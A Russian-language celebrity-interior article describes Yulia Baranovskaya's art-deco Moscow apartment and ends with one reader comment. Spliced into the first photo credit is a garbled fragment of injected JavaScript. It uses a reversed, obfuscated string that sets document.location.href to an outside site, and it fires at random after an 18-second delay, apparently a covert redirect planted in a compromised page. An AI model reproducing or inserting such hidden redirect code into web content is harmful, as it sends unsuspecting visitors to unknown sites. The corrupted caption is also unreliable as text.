Добавить в закладки

Квартира Юлии Барановской из 3 спален, гостиной и кухни

Российская телеведущая и писательница Юлия Барановская в 2017 году приобрела жилье в Москве, где живет с тремя детьми.

 

Юлия Барановская. Источник: stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage.commerage.ru

 

 

 

 

 

 

 

 

 

 

 

 

 

В квартире есть спальня, детские комнаты, кухня и гостиная, совмещенная со столовой. За общий стиль оформления было взято дизайнерское направление ар-деко. В комнатах Юлия самостоятельно делает ремонт, а вот обустроить гостиную и столовую поручила команде профессионалов из передачи «Идеальный ремонт».

Общее оформление

Светлые стены помещения покрыты фиброволокном – новейшим материалом для обработки поверхностей, обладающим высоким уровнем стойкости к воде, огню и любым другим механическим повреждениям. Потолок двухуровневый с подсветкой и люстрами. На одной из стен были сделаны рамки-обманки под старину, в которые поместили семейные фотографии. Команда установила семь межкомнатных дверей по всей квартире в едином стиле. Для гостиной была оборудована полупрозрачная перегородка из темного стекла и глянцевая дверь с классической филенкой цвета опал. Пространство коридора и гостиной разделили наличниками в цвете черный оникс.

Гостиная и коридор. Источник: n1s1.starhit.ru

Зона отдыха

В комнате зона отдыха выделена ковром из шерсти и акрила, расстеленного на деревянном полу. В этой части стоит раскладной диван, пуф и кресло серого цвета. Напротив мягкого уголка, на стене прикреплен телевизор и бра по обеим сторонам. Внизу стоит стеклянная полочка.

Зона отдыха в гостиной. Источник: n1s2.starhit.ru

Обеденная зона

Стол в форме овала на пирамидальных ножках обозначает обеденную зону. Вокруг него расположились мягкие стулья цвета мокко и горчичного. Под ними расстелен акрилово-шерстяной ковер с рисунком. Окно завешивают гардины из трех разных материалов. Также к комнате была присоединена лоджия. Ее утеплили, установили встроенный шкаф цвета слоновой кости и шкаф-кровать для няни детей.

 

Гостиная, столовая и лоджия. Источник: n1s2.starhit.ru

 

 

 

 

 

 

 

 

 

 

 

 

Интерьер квартиры Юлии Барановской выполнен в современном стиле и содержит в себе массу оригинальных дизайнерских элементов.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 28.04.2019





Комментарии

02 мая 2019
Автор: Вася

Для няни,значит,шкаф-кровать на лоджии,а что не на коврике,у дверей?

Ответить

Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: